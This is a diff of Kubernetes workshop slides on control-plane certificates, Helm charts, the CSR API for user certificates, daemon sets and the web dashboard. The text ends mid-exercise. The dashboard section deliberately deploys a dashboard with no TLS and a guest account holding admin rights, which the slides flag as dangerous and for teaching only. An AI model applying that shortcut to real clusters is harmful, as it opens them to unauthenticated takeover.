+  (for the same reasons as for etcd inter-peer authentication)
+
+- The etcd command line flags involved are:
+
+  `--client-cert-auth=true` to activate it
+
+  `--trusted-ca-file`, `--cert-file`, `--key-file`
+
+- The API server command line flags involved are:
+
+  `--etcd-cafile`, `--etcd-certfile`, `--etcd-keyfile`
+
+.footnote[¹Technically, there is also the etcd healthcheck. Let's ignore it for now.]
+
+---
+
+## API server clients
+
+- The API server has a sophisticated authentication and authorization system
+
+- For connections coming from other components of the control plane:
+
+  - authentication uses certificates (trusting the certificates' subject or CN)
+
+  - authorization uses whatever mechanism is enabled (most oftentimes, RBAC)
+
+- The relevant API server flags are:
+
+  `--client-ca-file`, `--tls-cert-file`, `--tls-private-key-file`
+
+- Each component connecting to the API server takes a `--kubeconfig` flag
+
+  (to specify a kubeconfig file containing the CA cert, client key, and client cert)
+
+- Yes, that kubeconfig file follows the same format as our `~/.kube/config` file!
+
+---
+
+## Kubelet and API server
+
+- Communication between kubelet and API server can be established both ways
+
+- Kubelet → API server:
+
+  - kubelet registers itself ("hi, I'm node42, do you have work for me?")
+
+  - connection is kept open and re-established if it breaks
+
+  - that's how the kubelet knows which pods to start/stop
+
+- API server → kubelet:
+
+  - used to retrieve logs, exec, attach to containers
+
+---
+
+## Kubelet → API server
+
+- Kubelet is started with `--kubeconfig` with API server information
+
+- The client certificate of the kubelet will typically have:
+
+  `CN=system:node:<nodename>` and groups `O=system:nodes`
+
+- Nothing special on the API server side
+
+  (it will authenticate like any other client)
+
+---
+
+## API server → kubelet
+
+- Kubelet is started with the flag `--client-ca-file`
+
+  (typically using the same CA as the API server)
+
+- API server will use a dedicated key pair when contacting kubelet
+
+  (specified with `--kubelet-client-certificate` and `--kubelet-client-key`)
+
+- Authorization uses webhooks
+
+  (enabled with `--authorization-mode=Webhook` on kubelet)
+
+- The webhook server is the API server itself
+
+  (the kubelet sends back a request to the API server to ask, "can this person do that?")
+
+---
+
+## Scheduler
+
+- The scheduler connects to the API server like an ordinary client
+
+- The certificate of the scheduler will have `CN=system:kube-scheduler`
+
+---
+
+## Controller manager
+
+- The controller manager is also a normal client to the API server
+
+- Its certificate will have `CN=system:kube-controller-manager`
+
+- If we use the CSR API, the controller manager needs the CA cert and key
+
+  (passed with flags `--cluster-signing-cert-file` and `--cluster-signing-key-file`)
+
+- We usually want the controller manager to generate tokens for service accounts
+
+- These tokens deserve some details (on the next slide!)
+
+---
+
+## Service account tokens
+
+- Each time we create a service account, the controller manager generates a token
+
+- These tokens are JWT tokens, signed with a particular key
+
+- These tokens are used for authentication with the API server
+
+  (and therefore, the API server needs to be able to verify their integrity)
+
+- This uses another keypair:
+
+  - the private key (used for signature) is passed to the controller manager
+    <br/>(using flags `--service-account-private-key-file` and `--root-ca-file`)
+
+  - the public key (used for verification) is passed to the API server
+    <br/>(using flag `--service-account-key-file`)
+
+---
+
+## kube-proxy
+
+- kube-proxy is "yet another API server client"
+
+- In many clusters, it runs as a Daemon Set
+
+- In that case, it will have its own Service Account and associated permissions
+
+- It will authenticate using the token of that Service Account
+
+---
+
+## Webhooks
+
+- We mentioned webhooks earlier; how does that really work?
+
+- The Kubernetes API has special resource types to check permissions
+
+- One of them is SubjectAccessReview
+
+- To check if a particular user can do a particular action on a particular resource:
+
+  - we prepare a SubjectAccessReview object
+
+  - we send that object to the API server
+
+  - the API server responds with allow/deny (and optional explanations)
+
+- Using webhooks for authorization = sending SAR to authorize each request
+
+---
+
+## Subject Access Review
+
+Here is an example showing how to check if `jean.doe` can `get` some `pods` in `kube-system`:
+
+```bash
+kubectl -v9 create -f- <<EOF
+apiVersion: authorization.k8s.io/v1beta1
+kind: SubjectAccessReview
+spec:
+  user: jean.doe
+  group:
+  - foo
+  - bar
+  resourceAttributes:
+    #group: blah.k8s.io
+    namespace: kube-system
+    resource: pods
+    verb: get
+    #name: web-xyz1234567-pqr89
+EOF
+```
--- a/slides/k8s/create-chart.md
+++ b/slides/k8s/create-chart.md
@@ -0,0 +1,114 @@
+## Creating a chart
+
+- We are going to show a way to create a *very simplified* chart
+
+- In a real chart, *lots of things* would be templatized
+
+  (Resource names, service types, number of replicas...)
+
+.exercise[
+
+- Create a sample chart:
+  ```bash
+  helm create dockercoins
+  ```
+
+- Move away the sample templates and create an empty template directory:
+  ```bash
+  mv dockercoins/templates dockercoins/default-templates
+  mkdir dockercoins/templates
+  ```
+
+]
+
+---
+
+## Exporting the YAML for our application
+
+- The following section assumes that DockerCoins is currently running
+
+.exercise[
+
+- Create one YAML file for each resource that we need:
+  .small[
+  ```bash
+
+	while read kind name; do
+	  kubectl get -o yaml $kind $name > dockercoins/templates/$name-$kind.yaml
+	done <<EOF
+	deployment worker
+	deployment hasher
+	daemonset rng
+	deployment webui
+	deployment redis
+	service hasher
+	service rng
+	service webui
+	service redis
+	EOF
+  ```
+  ]
+
+]
+
+---
+
+## Testing our helm chart
+
+.exercise[
+
+- Let's install our helm chart! (`dockercoins` is the path to the chart)
+  ```
+  helm install dockercoins
+  ```
+]
+
+--
+
+- Since the application is already deployed, this will fail:<br>
+`Error: release loitering-otter failed: services "hasher" already exists`
+
+- To avoid naming conflicts, we will deploy the application in another *namespace*
+
+---
+
+## Switching to another namespace
+
+- We can create a new namespace and switch to it
+
+  (Helm will automatically use the namespace specified in our context)
+
+- We can also tell Helm which namespace to use
+
+.exercise[
+
+- Tell Helm to use a specific namespace:
+  ```bash
+  helm install dockercoins --namespace=magenta
+  ```
+
+]
+
+---
+
+## Checking our new copy of DockerCoins
+
+- We can check the worker logs, or the web UI
+
+.exercise[
+
+- Retrieve the NodePort number of the web UI:
+  ```bash
+  kubectl get service webui --namespace=magenta
+  ```
+
+- Open it in a web browser
+
+- Look at the worker logs:
+  ```bash
+  kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
+  ```
+
+]
+
+Note: it might take a minute or two for the worker to start.
--- a/slides/k8s/create-more-charts.md
+++ b/slides/k8s/create-more-charts.md
@@ -0,0 +1,367 @@
+# Creating Helm charts
+
+- We are going to create a generic Helm chart
+
+- We will use that Helm chart to deploy DockerCoins
+
+- Each component of DockerCoins will have its own *release*
+
+- In other words, we will "install" that Helm chart multiple times
+
+  (one time per component of DockerCoins)
+
+---
+
+## Creating a generic chart
+
+- Rather than starting from scratch, we will use `helm create`
+
+- This will give us a basic chart that we will customize
+
+.exercise[
+
+- Create a basic chart:
+  ```bash
+  cd ~
+  helm create helmcoins
+  ```
+
+]
+
+This creates a basic chart in the directory `helmcoins`.
+
+---
+
+## What's in the basic chart?
+
+- The basic chart will create a Deployment and a Service
+
+- Optionally, it will also include an Ingress
+
+- If we don't pass any values, it will deploy the `nginx` image
+
+- We can override many things in that chart
+
+- Let's try to deploy DockerCoins components with that chart!
+
+---
+
+## Writing `values.yaml` for our components
+
+- We need to write one `values.yaml` file for each component
+
+  (hasher, redis, rng, webui, worker)
+
+- We will start with the `values.yaml` of the chart, and remove what we don't need
+
+- We will create 5 files:
+
+  hasher.yaml, redis.yaml, rng.yaml, webui.yaml, worker.yaml
+
+---
+
+## Getting started
+
+- For component X, we want to use the image dockercoins/X:v0.1
+
+  (for instance, for rng, we want to use the image dockercoins/rng:v0.1)
+
+- Exception: for redis, we want to use the official image redis:latest
+
+.exercise[
+
+- Write minimal YAML files for the 5 components, specifying only the image
+
+]
+
+--
+
+*Hint: our YAML files should look like this.*
+
+```yaml
+### rng.yaml
+image:
+  repository: dockercoins/`rng`
+  tag: v0.1
+```
+
+---
+
+## Deploying DockerCoins components
+
+- For convenience, let's work in a separate namespace
+
+.exercise[
+
+- Create a new namespace:
+  ```bash
+  kubectl create namespace helmcoins
+  ```
+
+- Switch to that namespace:
+  ```bash
+  kns helmcoins
+  ```
+
+]
+
+---
+
+## Deploying the chart
+
+- To install a chart, we can use the following command:
+  ```bash
+  helm install [--name `X`] <chart>
+  ```
+
+- We can also use the following command, which is idempotent:
+  ```bash
+  helm upgrade --install `X` chart
+  ```
+
+.exercise[
+
+- Install the 5 components of DockerCoins:
+  ```bash
+    for COMPONENT in hasher redis rng webui worker; do
+      helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
+    done
+  ```
+
+]
+
+---
+
+## Checking what we've done
+
+- Let's see if DockerCoins is working!
+
+.exercise[
+
+- Check the logs of the worker:
+  ```bash
+  stern worker
+  ```
+
+- Look at the resources that were created:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+There are *many* issues to fix!
+
+---
+
+## Service names
+
+- Our services should be named `rng`, `hasher`, etc., but they are named differently
+
+- Look at the YAML template used for the services
+
+- Does it look like we can override the name of the services?
+
+--
+
+- *Yes*, we can use `.Values.nameOverride`
+
+- This means setting `nameOverride` in the values YAML file
+
+---
+
+## Setting service names
+
+- Let's add `nameOverride: X` in each values YAML file!
+
+  (where X is hasher, redis, rng, etc.)
+
+.exercise[
+
+- Edit the 5 YAML files to add `nameOverride: X`
+
+- Deploy the updated Chart:
+  ```bash
+    for COMPONENT in hasher redis rng webui worker; do
+      helm upgrade --install $COMPONENT helmcoins/ --values=$COMPONENT.yaml
+    done
+  ```
+  (Yes, this is exactly the same command as before!)
+
+]
+
+---
+
+## Checking what we've done
+
+.exercise[
+
+- Check the service names:
+  ```bash
+  kubectl get services
+  ```
+  Great! (We have a useless service for `worker`, but let's ignore it for now.)
+
+- Check the state of the pods:
+  ```bash
+  kubectl get pods
+  ```
+  Not so great... Some pods are *not ready.*
+
+]
+
+---
+
+## Troubleshooting pods
+
+- The easiest way to troubleshoot pods is to look at *events*
+
+- We can look at all the events on the cluster (with `kubectl get events`)
+
+- Or we can use `kubectl describe` on the objects that have problems
+
+  (`kubectl describe` will retrieve the events related to the object)
+
+.exercise[
+
+- Check the events for the redis pods:
+  ```bash
+  kubectl describe pod -l app.kubernetes.io/name=redis
+  ```
+
+]
+
+What's going on?
+
+---
+
+## Healthchecks
+
+- The default chart defines healthchecks doing HTTP requests on port 80
+
+- That won't work for redis and worker
+
+  (redis is not HTTP, and not on port 80; worker doesn't even listen)
+
+--
+
+- We could comment out the healthchecks
+
+- We could also make them conditional
+
+- This sounds more interesting, let's do that!
+
+---
+
+## Conditionals
+
+- We need to enclose the healthcheck block with:
+
+  `{{ if CONDITION }}` at the beginning
+
+  `{{ end }}` at the end
+
+- For the condition, we will use `.Values.healthcheck`
+
+---
+
+## Updating the deployment template
+
+.exercise[
+
+- Edit `helmcoins/templates/deployment.yaml`
+
+- Before the healthchecks section (it starts with `livenessProbe:`), add:
+
+  `{{ if .Values.healthcheck }}`
+
+- After the healthchecks section (just before `resources:`), add:
+
+  `{{ end }}`
+
+- Edit `hasher.yaml`, `rng.yaml`, `webui.yaml` to add:
+
+  `healthcheck: true`
+
+]
+
+---
+
+## Update the deployed charts
+
+- We can now apply the new templates (and the new values)
+
+.exercise[
+
+- Use the same command as earlier to upgrade all five components
+
+- Use `kubectl describe` to confirm that `redis` starts correctly
+
+- Use `kubectl describe` to confirm that `hasher` still has healthchecks
+
+]
+
+---
+
+## Is it working now?
+
+- If we look at the worker logs, it appears that the worker is still stuck
+
+- What could be happening?
+
+--
+
+- The redis service is not on port 80!
+
+- We need to update the port number in redis.yaml
+
+- We also need to update the port number in deployment.yaml
+
+  (it is hard-coded to 80 there)
+
+---
+
+## Setting the redis port
+
+.exercise[
+
+- Edit `redis.yaml` to add:
+  ```yaml
+    service:
+      port: 6379
+  ```
+
+- Edit `helmcoins/templates/deployment.yaml`
+
+- The line with `containerPort` should be:
+  ```yaml
+  containerPort: {{ .Values.service.port }}
+  ```
+
+]
+
+---
+
+## Apply changes
+
+- Re-run the for loop to execute `helm upgrade` one more time
+
+- Check the worker logs
+
+- This time, it should be working!
+
+---
+
+## Extra steps
+
+- We don't need to create a service for the worker
+
+- We can put the whole service block in a conditional
+
+  (this will require additional changes in other files referencing the service)
+
+- We can set the webui to be a NodePort service
+
+- We can change the number of workers with `replicaCount`
+
+- And much more!
--- a/slides/k8s/csr-api.md
+++ b/slides/k8s/csr-api.md
@@ -0,0 +1,426 @@
+# The CSR API
+
+- The Kubernetes API exposes CSR resources
+
+- We can use these resources to issue TLS certificates
+
+- First, we will go through a quick reminder about TLS certificates
+
+- Then, we will see how to obtain a certificate for a user
+
+- We will use that certificate to authenticate with the cluster
+
+- Finally, we will grant some privileges to that user
+
+---
+
+## Reminder about TLS
+
+- TLS (Transport Layer Security) is a protocol providing:
+
+  - encryption (to prevent eavesdropping)
+
+  - authentication (using public key cryptography)
+
+- When we access an https:// URL, the server authenticates itself
+
+  (it proves its identity to us; as if it were "showing its ID")
+
+- But we can also have mutual TLS authentication (mTLS)
+
+  (client proves its identity to server; server proves its identity to client)
+
+---
+
+## Authentication with certificates
+
+- To authenticate, someone (client or server) needs:
+
+  - a *private key* (that remains known only to them)
+
+  - a *public key* (that they can distribute)
+
+  - a *certificate* (associating the public key with an identity)
+
+- A message encrypted with the private key can only be decrypted with the public key
+
+  (and vice versa)
+
+- If I use someone's public key to encrypt/decrypt their messages,
+  <br/>
+  I can be certain that I am talking to them / they are talking to me
+
+- The certificate proves that I have the correct public key for them
+
+---
+
+## Certificate generation workflow
+
+This is what I do if I want to obtain a certificate.
+
+1. Create public and private keys.
+
+2. Create a Certificate Signing Request (CSR).
+
+   (The CSR contains the identity that I claim and a public key.)
+
+3. Send that CSR to the Certificate Authority (CA).
+
+4. The CA verifies that I can claim the identity in the CSR.
+
+5. The CA generates my certificate and gives it to me.
+
+The CA (or anyone else) never needs to know my private key.
+
+---
+
+## The CSR API
+
+- The Kubernetes API has a CertificateSigningRequest resource type
+
+  (we can list them with e.g. `kubectl get csr`)
+
+- We can create a CSR object
+
+  (= upload a CSR to the Kubernetes API)
+
+- Then, using the Kubernetes API, we can approve/deny the request
+
+- If we approve the request, the Kubernetes API generates a certificate
+
+- The certificate gets attached to the CSR object and can be retrieved
+
+---
+
+## Using the CSR API
+
+- We will show how to use the CSR API to obtain user certificates
+
+- This will be a rather complex demo
+
+- ... And yet, we will take a few shortcuts to simplify it
+
+  (but it will illustrate the general idea)
+
+- The demo also won't be automated
+
+  (we would have to write extra code to make it fully functional)
+
+---
+
+## General idea
+
+- We will create a Namespace named "users"
+
+- Each user will get a ServiceAccount in that Namespace
+
+- That ServiceAccount will give read/write access to *one* CSR object
+
+- Users will use that ServiceAccount's token to submit a CSR
+
+- We will approve the CSR (or not)
+
+- Users can then retrieve their certificate from their CSR object
+
+- ...And use that certificate for subsequent interactions
+
+---
+
+## Resource naming
+
+For a user named `jean.doe`, we will have:
+
+- ServiceAccount `jean.doe` in Namespace `users`
+
+- CertificateSigningRequest `users:jean.doe`
+
+- ClusterRole `users:jean.doe` giving read/write access to that CSR
+
+- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
+
+---
+
+## Creating the user's resources
+
+.warning[If you want to use another name than `jean.doe`, update the YAML file!]
+
+.exercise[
+
+- Create the global namespace for all users:
+  ```bash
+  kubectl create namespace users
+  ```
+
+- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
+  ```bash
+  kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
+  ```
+
+]
+
+---
+
+## Extracting the user's token
+
+- Let's obtain the user's token and give it to them
+
+  (the token will be their password)
+
+.exercise[
+
+- List the user's secrets:
+  ```bash
+  kubectl --namespace=users describe serviceaccount jean.doe
+  ```
+
+- Show the user's token:
+  ```bash
+  kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
+  ```
+
+]
+
+---
+
+## Configure `kubectl` to use the token
+
+- Let's create a new context that will use that token to access the API
+
+.exercise[
+
+- Add a new identity to our kubeconfig file:
+  ```bash
+  kubectl config set-credentials token:jean.doe --token=...
+  ```
+
+- Add a new context using that identity:
+  ```bash
+  kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
+  ```
+
+]
+
+---
+
+## Access the API with the token
+
+- Let's check that our access rights are set properly
+
+.exercise[
+
+- Try to access any resource:
+  ```bash
+  kubectl get pods
+  ```
+  (This should tell us "Forbidden")
+
+- Try to access "our" CertificateSigningRequest:
+  ```bash
+  kubectl get csr users:jean.doe
+  ```
+  (This should tell us "NotFound")
+
+]
+
+---
+
+## Create a key and a CSR
+
+- There are many tools to generate TLS keys and CSRs
+
+- Let's use OpenSSL; it's not the best one, but it's installed everywhere
+
+  (many people prefer cfssl, easyrsa, or other tools; that's fine too!)
+
+.exercise[
+
+- Generate the key and certificate signing request:
+  ```bash
+    openssl req -newkey rsa:2048 -nodes -keyout key.pem \
+                -new -subj /CN=jean.doe/O=devs/ -out csr.pem
+  ```
+
+]
+
+The command above generates:
+
+- a 2048-bit RSA key, without encryption, stored in key.pem
+- a CSR for the name `jean.doe` in group `devs`
+
+---
+
+## Inside the Kubernetes CSR object
+
+- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
+
+- The PEM file needs to be encoded to base64 on a single line
+
+  (we will use `base64 -w0` for that purpose)
+
+- The Kubernetes CSR object also needs to list the right "usages"
+
+  (these are flags indicating how the certificate can be used)
+
+---
+
+## Sending the CSR to Kubernetes
+
+.exercise[
+
+- Generate and create the CSR resource:
+  ```bash
+    kubectl apply -f - <<EOF
+    apiVersion: certificates.k8s.io/v1beta1
+    kind: CertificateSigningRequest
+    metadata:
+      name: users:jean.doe
+    spec:
+      request: $(base64 -w0 < csr.pem)
+      usages:
+      - digital signature
+      - key encipherment
+      - client auth
+    EOF
+  ```
+
+]
+
+---
+
+## Adjusting certificate expiration
+
+- By default, the CSR API generates certificates valid 1 year
+
+- We want to generate short-lived certificates, so we will lower that to 1 hour
+
+- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
+
+.exercise[
+
+- Edit the static pod definition for the controller manager:
+  ```bash
+  sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
+  ```
+
+- In the list of flags, add the following line:
+  ```bash
+  - --experimental-cluster-signing-duration=1h
+  ```
+
+]
+
+---
+
+## Verifying and approving the CSR
+
+- Let's inspect the CSR, and if it is valid, approve it
+
+.exercise[
+
+- Switch back to `cluster-admin`:
+  ```bash
+  kctx -
+  ```
+
+- Inspect the CSR:
+  ```bash
+  kubectl describe csr users:jean.doe
+  ```
+
+- Approve it:
+  ```bash
+  kubectl certificate approve users:jean.doe
+  ```
+
+]
+
+---
+
+## Obtaining the certificate
+
+.exercise[
+
+- Switch back to the user's identity:
+  ```bash
+  kctx -
+  ```
+
+- Retrieve the updated CSR object and extract the certificate:
+  ```bash
+  kubectl get csr users:jean.doe \
+          -o jsonpath={.status.certificate} \
+          | base64 -d > cert.pem
+  ```
+
+- Inspect the certificate:
+  ```bash
+  openssl x509 -in cert.pem -text -noout
+  ```
+
+]
+
+---
+
+## Using the certificate
+
+.exercise[
+
+- Add the key and certificate to kubeconfig:
+  ```bash
+  kubectl config set-credentials cert:jean.doe --embed-certs \
+          --client-certificate=cert.pem --client-key=key.pem
+  ```
+
+- Update the user's context to use the key and cert to authenticate:
+  ```bash
+  kubectl config set-context jean.doe --user cert:jean.doe
+  ```
+
+- Confirm that we are seen as `jean.doe` (but don't have permissions):
+  ```bash
+  kubectl get pods
+  ```
+
+]
+
+---
+
+## What's missing?
+
+We have just shown, step by step, a method to issue short-lived certificates for users.
+
+To be usable in real environments, we would need to add:
+
+- a kubectl helper to automatically generate the CSR and obtain the cert
+
+  (and transparently renew the cert when needed)
+
+- a Kubernetes controller to automatically validate and approve CSRs
+
+  (checking that the subject and groups are valid)
+
+- a way for the users to know the groups to add to their CSR
+
+  (e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
+
+---
+
+## Is this realistic?
+
+- Larger organizations typically integrate with their own directory
+
+- The general principle, however, is the same:
+
+  - users have long-term credentials (password, token, ...)
+
+  - they use these credentials to obtain other, short-lived credentials
+
+- This provides enhanced security:
+
+  - the long-term credentials can use long passphrases, 2FA, HSM...
+
+  - the short-term credentials are more convenient to use
+
+  - we get strong security *and* convenience
+
+- Systems like Vault also have certificate issuance mechanisms
--- a/slides/k8s/daemonset.md
+++ b/slides/k8s/daemonset.md
@@ -4,15 +4,29 @@

 - We want one (and exactly one) instance of `rng` per node

- What if we just scale up `deploy/rng` to the number of nodes?
+- We *do not want* two instances of `rng` on the same node

-  - nothing guarantees that the `rng` containers will be distributed evenly
+- We will do that with a *daemon set*

-  - if we add nodes later, they will not automatically run a copy of `rng`
+---

-  - if we remove (or reboot) a node, one `rng` container will restart elsewhere
+## Why not a deployment?

- Instead of a `deployment`, we will use a `daemonset`
+- Can't we just do `kubectl scale deployment rng --replicas=...`?
+
+--
+
+- Nothing guarantees that the `rng` containers will be distributed evenly
+
+- If we add nodes later, they will not automatically run a copy of `rng`
+
+- If we remove (or reboot) a node, one `rng` container will restart elsewhere
+
+  (and we will end up with two instances `rng` on the same node)
+
+- By contrast, a daemon set will start one pod per node and keep it that way
+
+  (as nodes are added or removed)

 ---

@@ -38,7 +52,7 @@

 <!-- ##VERSION## -->

- Unfortunately, as of Kubernetes 1.14, the CLI cannot create daemon sets
+- Unfortunately, as of Kubernetes 1.15, the CLI cannot create daemon sets

 --

@@ -73,18 +87,13 @@

 - Dump the `rng` resource in YAML:
  ```bash
-  kubectl get deploy/rng -o yaml --export >rng.yml 
+  kubectl get deploy/rng -o yaml >rng.yml
  ```

 - Edit `rng.yml`

 ]

-Note: `--export` will remove "cluster-specific" information, i.e.:
- namespace (so that the resource is not tied to a specific namespace)
- status and creation timestamp (useless when creating a new resource)
- resourceVersion and uid (these would cause... *interesting* problems)
-
 ---

 ## "Casting" a resource to another
@@ -376,7 +385,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la

 - Bottom line: if we remove our `app=rng` label ...

- ... The pod "diseappears" for its parent, which re-creates another pod to replace it
+ ... The pod "disappears" for its parent, which re-creates another pod to replace it

 ---

--- a/slides/k8s/dashboard.md
+++ b/slides/k8s/dashboard.md
@@ -2,88 +2,60 @@

 - Kubernetes resources can also be viewed with a web dashboard

- We are going to deploy that dashboard with *three commands:*
+- That dashboard is usually exposed over HTTPS

-  1) actually *run* the dashboard
+  (this requires obtaining a proper TLS certificate)

-  2) bypass SSL for the dashboard
+- Dashboard users need to authenticate

-  3) bypass authentication for the dashboard
+- We are going to take a *dangerous* shortcut

--
+---

-There is an additional step to make the dashboard available from outside (we'll get to that)
+## The insecure method

--
+- We could (and should) use [Let's Encrypt](https://letsencrypt.org/) ...
+
+- ... but we don't want to deal with TLS certificates
+
+- We could (and should) learn how authentication and authorization work ...
+
+- ... but we will use a guest account with admin access instead

 .footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]

 ---

-## 1) Running the dashboard
+## Running a very insecure dashboard

- We need to create a *deployment* and a *service* for the dashboard
+- We are going to deploy that dashboard with *one single command*

- But also a *secret*, a *service account*, a *role* and a *role binding*
+- This command will create all the necessary resources

- All these things can be defined in a YAML file and created with `kubectl apply -f`
+  (the dashboard itself, the HTTP wrapper, the admin/guest account)
+
+- All these resources are defined in a YAML file
+
+- All we have to do is load that YAML file with with `kubectl apply -f`

 .exercise[

 - Create all the dashboard resources, with the following command:
  ```bash
-  kubectl apply -f ~/container.training/k8s/kubernetes-dashboard.yaml
+  kubectl apply -f ~/container.training/k8s/insecure-dashboard.yaml
  ```

 ]

 ---

-
-## 2) Bypassing SSL for the dashboard
-
- The Kubernetes dashboard uses HTTPS, but we don't have a certificate
-
- Recent versions of Chrome (63 and later) and Edge will refuse to connect
-
-  (You won't even get the option to ignore a security warning!)
-
- We could (and should!) get a certificate, e.g. with [Let's Encrypt](https://letsencrypt.org/)
-
- ... But for convenience, for this workshop, we'll forward HTTP to HTTPS
-
-.warning[Do not do this at home, or even worse, at work!]
-
---
-
-## Running the SSL unwrapper
-
- We are going to run [`socat`](http://www.dest-unreach.org/socat/doc/socat.html), telling it to accept TCP connections and relay them over SSL
-
- Then we will expose that `socat` instance with a `NodePort` service
-
- For convenience, these steps are neatly encapsulated into another YAML file
-
-.exercise[
-
- Apply the convenient YAML file, and defeat SSL protection:
-  ```bash
-  kubectl apply -f ~/container.training/k8s/socat.yaml
-  ```
-
-]
-
-.warning[All our dashboard traffic is now clear-text, including passwords!]
-
---
-
 ## Connecting to the dashboard

 .exercise[

 - Check which port the dashboard is on:
  ```bash
-  kubectl -n kube-system get svc socat
+  kubectl get svc dashboard
  ```

 ]
@@ -113,26 +85,7 @@ The dashboard will then ask you which authentication you want to use.

  - "skip" (use the dashboard "service account")

- Let's use "skip": we get a bunch of warnings and don't see much
-
---
-
-## 3) Bypass authentication for the dashboard
-
- The dashboard documentation [explains how to do this](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)
-
- We just need to load another YAML file!
-
-.exercise[
-
- Grant admin privileges to the dashboard so we can see our resources:
-  ```bash
-  kubectl apply -f ~/container.training/k8s/grant-admin-to-dashboard.yaml
-  ```
-
- Reload the dashboard and enjoy!
-
-]
+- Let's use "skip": we're logged in!

 --

@@ -140,68 +93,6 @@ The dashboard will then ask you which authentication you want to use.

 ---

-## Exposing the dashboard over HTTPS
-
- We took a shortcut by forwarding HTTP to HTTPS inside the cluster
-
- Let's expose the dashboard over HTTPS!
-
- The dashboard is exposed through a `ClusterIP` service (internal traffic only)
-
- We will change that into a `NodePort` service (accepting outside traffic)
-
-.exercise[
-
- Edit the service:
-  ```
-  kubectl edit service kubernetes-dashboard
-  ```
-
-]
-
--
-
-`NotFound`?!? Y U NO WORK?!?
-
---
-
-## Editing the `kubernetes-dashboard` service
-
- If we look at the [YAML](https://github.com/jpetazzo/container.training/blob/master/k8s/kubernetes-dashboard.yaml) that we loaded before, we'll get a hint
-
--
-
- The dashboard was created in the `kube-system` namespace
-
--
-
-.exercise[
-
- Edit the service:
-  ```bash
-  kubectl -n kube-system edit service kubernetes-dashboard
-  ```
-
- Change type `type:` from `ClusterIP` to `NodePort`, save, and exit
-
-<!--
-```wait Please edit the object below```
-```keys /ClusterIP```
-```keys ^J```
-```keys cwNodePort```
-```keys ^[ ``` ]
-```keys :wq```
-```keys ^J```
-->
-
- Check the port that was assigned with `kubectl -n kube-system get services`
-
- Connect to https://oneofournodes:3xxxx/ (yes, https)
-
-]
-
---
-
 ## Running the Kubernetes dashboard securely

 - The steps that we just showed you are *for educational purposes only!*
@@ -262,5 +153,7 @@ The dashboard will then ask you which authentication you want to use.

 --

- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
+- It introduces new failure modes
+
+  (for instance, if you try to apply YAML from a link that's no longer valid)

--- a/slides/k8s/declarative.md
+++ b/slides/k8s/declarative.md
@@ -1,6 +1,20 @@
 ## Declarative vs imperative in Kubernetes

- Virtually everything we create in Kubernetes is created from a *spec*
+- With Kubernetes, we cannot say: "run this container"
+
+- All we can do is write a *spec* and push it to the API server
+
+  (by creating a resource like e.g. a Pod or a Deployment)
+
+- The API server will validate that spec (and reject it if it's invalid)
+
+- Then it will store it in etcd
+
+- A *controller* will "notice" that spec and act upon it
+
+---
+
+## Reconciling state

 - Watch for the `spec` fields in the YAML files later!

--- a/slides/k8s/deploymentslideshow.md
+++ b/slides/k8s/deploymentslideshow.md
@@ -0,0 +1,67 @@
+## 19,000 words
+
+They say, "a picture is worth one thousand words."
+
+The following 19 slides show what really happens when we run:
+
+```bash
+kubectl run web --image=nginx --replicas=3
+```
+
+---
+class: pic
+![](images/kubectl-run-slideshow/01.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/02.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/03.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/04.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/05.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/06.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/07.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/08.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/09.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/10.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/11.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/12.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/13.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/14.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/15.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/16.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/17.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/18.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/19.svg)
--- a/slides/k8s/dmuc.md
+++ b/slides/k8s/dmuc.md
@@ -0,0 +1,837 @@
+# Building our own cluster
+
+- Let's build our own cluster!
+
+  *Perfection is attained not when there is nothing left to add, but when there is nothing left to take away. (Antoine de Saint-Exupery)*
+
+- Our goal is to build a minimal cluster allowing us to:
+
+  - create a Deployment (with `kubectl run` or `kubectl create deployment`)
+  - expose it with a Service
+  - connect to that service
+
+
+- "Minimal" here means:
+
+  - smaller number of components
+  - smaller number of command-line flags
+  - smaller number of configuration files
+
+---
+
+## Non-goals
+
+- For now, we don't care about security
+
+- For now, we don't care about scalability
+
+- For now, we don't care about high availability
+
+- All we care about is *simplicity*
+
+---
+
+## Our environment
+
+- We will use the machine indicated as `dmuc1`
+
+  (this stands for "Dessine Moi Un Cluster" or "Draw Me A Sheep",
+  <br/>in homage to Saint-Exupery's "The Little Prince")
+
+- This machine:
+
+  - runs Ubuntu LTS
+
+  - has Kubernetes, Docker, and etcd binaries installed
+
+  - but nothing is running
+
+---
+
+## Checking our environment
+
+- Let's make sure we have everything we need first
+
+.exercise[
+
+- Log into the `dmuc1` machine
+
+- Get root:
+  ```bash
+  sudo -i
+  ```
+
+- Check available versions:
+  ```bash
